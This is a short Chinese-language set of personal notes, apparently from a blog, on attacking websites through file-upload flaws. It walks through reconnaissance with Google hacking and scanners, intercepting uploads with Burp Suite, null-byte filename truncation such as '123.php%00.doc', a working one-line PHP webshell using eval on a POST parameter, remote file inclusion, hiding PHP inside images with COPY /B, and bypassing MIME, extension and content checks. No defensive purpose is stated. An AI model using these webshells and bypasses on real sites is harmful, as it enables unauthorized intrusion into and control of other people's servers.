? ? ? ? JSON,主要用于跟服務(wù)器進(jìn)行交換數(shù)據(jù)。跟XML相類似,它獨(dú)立語言,在跨平臺(tái)數(shù)據(jù)傳輸上有很大的優(yōu)勢。
? ? ? ?eval(string)用于計(jì)算string式子的值
1.社工信息收集。
google hack語法 : http://www.qxzxp.com/4719.html ? ? ? ? ? SNS垂直搜索。鐘馗之眼
或者使用御劍這樣的掃描工具掃描旁注站點(diǎn)或者C段等
可以找到上傳或者注入點(diǎn)。
2.首次接觸使用burp Suit
找到上傳post。將本來的后綴名改掉。也可以直接123.php%00.doc。運(yùn)行時(shí)php會(huì)把后面刪掉了
3.編寫一行木馬
到自己直接寫的時(shí)候發(fā)現(xiàn)居然寫錯(cuò)了,來再寫一遍<?php @eval($_POST['upshang']);?>
4.文件名截?cái)嗬?/p>
%00截?cái)嗍莗hp解析的漏銅但版本是在5.3.4就行,查看版本號(hào)可以利用
<?php phpinfo(); ?>上傳一下看一下。
5.文件包含
前提打開了allow_url_fopen或者allow_url_include關(guān)鍵字?page=.
兩種:雙寫和編碼。編碼也可以用在注入
6.正規(guī)上傳并不能用菜刀直接去開,例子用的是文件包含打開的。。。
7.代理發(fā)包其實(shí)就是自己重新構(gòu)造。所以其實(shí)就是根據(jù)實(shí)際情況構(gòu)造包。而同時(shí)網(wǎng)頁php過濾機(jī)制即在客戶端的過濾機(jī)制其實(shí)在任何web攻擊中都是不用管的。拿到一個(gè)報(bào)模型。按著自己的改就行。剩下的只是服務(wù)器的WAF。例如上傳這里文件名會(huì)以你協(xié)議中的保存。而不是你發(fā)的包。例如你發(fā)的.png .jpg都會(huì)按php存。在一些沒有檢測的服務(wù)器中。
8.圖片隱藏文本COPY source1 [/A | /B] + source2 [/A | /B]? destination [/A | /B]
A表示ASCII文件,B表示二進(jìn)制文件,一定要注明。
jpg用二進(jìn)制。文本要保留下來用ASCII
9.高級(jí)的會(huì)限制下MIME,大概是type。改一下就行
10.最高級(jí)的是會(huì)將文件與post頭進(jìn)行md5檢驗(yàn)。并加了token值。后者還有辦法。前者可以在圖片里插入php。以png上傳。再利用.htaccess或者文件包含漏洞促發(fā)了
11.

12.直接查后綴名,想繞過可以試一試路徑攻擊/up.php ./up.jpg會(huì)把后面的內(nèi)容寫在前面的。當(dāng)然這是在內(nèi)容繞過以后了
13。文件內(nèi)容繞過。加花加殼